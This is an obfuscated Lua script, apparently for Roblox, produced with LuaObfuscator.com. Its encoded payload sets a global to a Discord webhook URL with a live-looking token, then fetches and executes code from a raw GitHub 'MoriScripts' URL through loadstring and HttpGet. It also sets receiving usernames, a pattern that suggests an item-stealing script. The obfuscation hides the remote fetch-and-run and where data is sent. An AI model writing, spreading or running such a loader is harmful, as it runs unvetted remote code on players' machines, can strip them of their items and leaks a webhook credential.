--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=0 + 0 ;local v71;while true do if (v70==(0 -0)) then v71=(v31/((5 -3)^(v32-(1 -0))))%((2 + 0)^(((v33-(2 -(958 -(892 + 65)))) -(v32-((2542 -1476) -(68 + 997)))) + (620 -(555 + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;end end else local v72=(570 -(367 + 201))^(v32-(118 -(32 + 85))) ;return (((v31%(v72 + v72))>=v72) and (928 -((395 -181) + 713))) or (0 + (0 -0)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (353 -(64 + 23 + 263)) );v19=v19 + (184 -(67 + 113)) ;return (v37 * (12302277 + 4474939)) + (v36 * ((639498 -478597) -95365)) + (v35 * (1208 -(802 + 150))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=1482 -(1395 + 87) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==2) then v43=nil;v44=nil;v38=3;end if (v38==(1374 -(729 + 645))) then v39=0;v40=nil;v38=393 -(232 + 160) ;end if (v38==3) then v45=nil;while true do local v78=0 -0 ;while true do if (v78==0) then if (v39==(1277 -(37 + 1240))) then local v102=0;while true do if (v102==(0 -0)) then local v106=0 -0 ;while true do if (v106~=(0 -0)) then else v40={};v41={};v106=1 + 0 ;end if (v106==1) then v102=1 -0 ;break;end end end if (v102~=1) then else v42={};v39=1;break;end end end if (v39==2) then local v103=0;while true do if (v103==0) then for v108=1,v44 do local v109=0;local v110;local v111;local v112;while true do if (v109~=(0 + 0)) then else local v159=1474 -(1329 + 145) ;while true do if (v159~=(971 -(140 + 831))) then else v110=1850 -(1409 + 441) ;v111=nil;v159=1;end if (v159~=(719 -(15 + 703))) then else v109=1;break;end end end if (v109~=1) then else v112=nil;while true do if ((0 + 0)~=v110) then else local v170=438 -(262 + 176) ;while true do if (v170==(1721 -(345 + 1376))) then v111=v22();v112=nil;v170=1;end if (v170~=(689 -(198 + 490))) then else v110=4 -3 ;break;end end end if (v110==1) then if (v111==1) then v112=v22()~=0 ;elseif (v111==(4 -2)) then v112=v25();elseif (v111~=3) then else v112=v26();end v45[v108]=v112;break;end end break;end end end v43[1209 -(696 + 510) ]=v22();v103=1;end if ((1 -0)~=v103) then else for v113=1263 -(1091 + 171) ,v24() do local v114=0 + 0 ;local v115;while true do if ((0 -0)==v114) then v115=v22();if (v21(v115,1,3 -2 )==0) then local v165=374 -(123 + 251) ;local v166;local v167;local v168;local v169;while true do if (v165~=1) then else local v172=0 -0 ;while true do if (v172==(699 -(208 + 490))) then v165=2;break;end if (v172~=0) then else v168=nil;v169=nil;v172=1 + 0 ;end end end if (v165==(1 + 1)) then while true do if ((836 -(660 + 176))~=v166) then else v167=v21(v115,2,3);v168=v21(v115,4,6);v166=1 + 0 ;end if (v166==(203 -(14 + 188))) then local v173=0;while true do if (v173==(675 -(534 + 141))) then local v179=0 + 0 ;while true do if ((1 + 0)==v179) then v173=1 + 0 ;break;end if (v179==(0 -0)) then v169={v23(),v23(),nil,nil};if (v167==(0 + 0)) then local v181=0 + 0 ;local v182;while true do if (v181==0) then v182=396 -(115 + 281) ;while true do if (v182==(0 -0)) then v169[3 + 0 ]=v23();v169[9 -5 ]=v23();break;end end break;end end elseif (v167==(3 -2)) then v169[870 -(550 + 317) ]=v24();elseif (v167==(2 -0)) then v169[3]=v24() -((2 -0)^16) ;elseif (v167==3) then local v191=0 -0 ;local v192;local v193;local v194;while true do if (v191==(285 -(134 + 151))) then v192=1665 -(970 + 695) ;v193=nil;v191=1;end if (v191==(1 -0)) then v194=nil;while true do if (v192==(1991 -(582 + 1408))) then while true do if (v193==0) then v194=0;while true do if (v194==(0 -0)) then v169[3 -0 ]=v24() -((7 -5)^16) ;v169[4]=v23();break;end end break;end end break;end if (v192==0) then local v195=1824 -(1195 + 629) ;while true do if (v195~=(0 -0)) then else v193=0;v194=nil;v195=242 -(187 + 54) ;end if (v195==(781 -(162 + 618))) then v192=1;break;end end end end break;end end end v179=1;end end end if (v173==(1 + 0)) then v166=2 + 0 ;break;end end end if (v166==(6 -3)) then if (v21(v168,4 -1 ,3)~=(1 + 0)) then else v169[1640 -(1373 + 263) ]=v45[v169[4]];end v40[v113]=v169;break;end if (v166==2) then local v175=0;local v176;while true do if (v175==0) then v176=1000 -(451 + 549) ;while true do if (v176==0) then local v180=0;while true do if (v180==(1 + 0)) then v176=1;break;end if (v180~=(0 -0)) then else if (v21(v168,1 -0 ,1)==1) then v169[1386 -(746 + 638) ]=v45[v169[2]];end if (v21(v168,2,2)==(1 + 0)) then v169[4 -1 ]=v45[v169[3]];end v180=342 -(218 + 123) ;end end end if (v176==(1582 -(1535 + 46))) then v166=3 + 0 ;break;end end break;end end end end break;end if (v165==0) then v166=0 + 0 ;v167=nil;v165=561 -(306 + 254) ;end end end break;end end end v39=3;break;end end end v78=1 + 0 ;end if (v78~=1) then else if (v39==3) then local v104=0 -0 ;while true do if (0==v104) then for v116=1468 -(899 + 568) ,v24() do v41[v116-1 ]=v29();end return v43;end end end if (v39~=(1 + 0)) then else local v105=0 -0 ;while true do if (1==v105) then v45={};v39=605 -(268 + 335) ;break;end if (v105==(290 -(60 + 230))) then v43={v40,v41,nil,v42};v44=v24();v105=573 -(426 + 146) ;end end end break;end end end break;end if (v38==1) then v41=nil;v42=nil;v38=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1457 -(282 + 419 + 755))) then v49=812 -(569 + 242) ;v50=(v21(v48,1,57 -37 ) * ((1 + 1)^(1056 -(706 + 318)))) + v47 ;v46=1253 -(721 + (1675 -(466 + 679))) ;end if ((1271 -(945 + 326))==v46) then v47=v24();v48=v24();v46=1;end if (v46==(4 -2)) then v51=v21(v48,19 + (4 -2) ,88 -57 );v52=((v21(v48,32)==1) and  -(701 -(271 + 429))) or (1 + 0) ;v46=1503 -(1408 + 92) ;end if (v46==(1089 -(461 + 625))) then if (v51==(1288 -(993 + (2195 -(106 + 1794))))) then if (v50==(0 + 0 + 0)) then return v52 * 0 ;else local v96=1171 -(418 + 753) ;while true do if (v96==(0 + 0 + 0)) then v51=1 + 0 ;v49=0 + 0 ;break;end end end elseif (v51==(518 + (4513 -2984))) then return ((v50==0) and (v52 * ((530 -(406 + 123))/0))) or (v52 * NaN) ;end return v8(v52,v51-(2792 -(1749 + 20)) ) * (v49 + (v50/((1 + 1)^(1374 -(1249 + 73))))) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(115 -(4 + 110)) );v19=v19 + v53 ;local v55={};for v68=585 -(57 + 527) , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=1427 -(41 + 1386) ;local v58;local v59;while true do if (v57==(104 -(17 + 86))) then return (v59 * (174 + 82)) + v58 ;end if (v57==(0 -0)) then v58,v59=v1(v16,v19,v19 + ((8 -3) -3) );v19=v19 + (168 -(122 + 44)) ;v57=1;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v73=0;local v74;while true do if (v73==0) then v74=v2(v0(v60,16));if v20 then local v97=v5(v74,v20);v20=nil;return v97;else return v74;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92==0) then v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]]=v91[3];end elseif (v92<=2) then local v122=v91[2];local v123=v89[v91[3]];v89[v122 + 1 ]=v123;v89[v122]=v123[v91[4]];elseif (v92==3) then do return;end else v83=v91[3];end elseif (v92<=7) then if (v92<=5) then local v127=v91[2];local v128,v129=v82(v89[v127](v13(v89,v127 + 1 ,v91[3])));v84=(v129 + v127) -1 ;local v130=0;for v142=v127,v84 do v130=v130 + 1 ;v89[v142]=v128[v130];end elseif (v92==6) then v89[v91[2]]();else v89[v91[2]]();end elseif (v92<=8) then local v131=v91[2];local v132=v89[v91[3]];v89[v131 + 1 ]=v132;v89[v131]=v132[v91[4]];elseif (v92==9) then local v146=v91[2];v89[v146]=v89[v146](v13(v89,v146 + 1 ,v84));elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=15) then if (v92<=12) then if (v92==11) then do return;end else local v136=v91[2];v89[v136]=v89[v136](v13(v89,v136 + 1 ,v84));end elseif (v92<=13) then v89[v91[2]]=v63[v91[3]];elseif (v92>14) then v89[v91[2]]=v91[3];else v89[v91[2]]=v63[v91[3]];end elseif (v92<=18) then if (v92<=16) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==17) then v83=v91[3];else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=19) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==20) then local v155=v91[2];local v156,v157=v82(v89[v155](v13(v89,v155 + 1 ,v91[3])));v84=(v157 + v155) -1 ;local v158=0;for v160=v155,v84 do v158=v158 + 1 ;v89[v160]=v156[v158];end elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end v83=v83 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132303133302O38333530393239373139322F737456685057514F754F45704C302D31396B61382O794759303731643836666E76515F354C2D774B4E684E754A5342543766744B38433551386A652D644339666234324D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030C3O006A736A73676A2O737768656803093O00557365724E616D653200173O0012013O00013O00260A3O000E000100020004113O000E000100120D000100033O00301200010004000500120D000100063O00120D000200073O002008000200020008001201000400094O0013000500014O0014000200054O000C00013O00022O00060001000100010004113O0016000100260A3O0001000100010004113O0001000100120D000100033O0030120001000A000B00120D000100033O0030120001000C000B0012013O00023O0004113O000100012O00033O00017O00",v9(),...);end
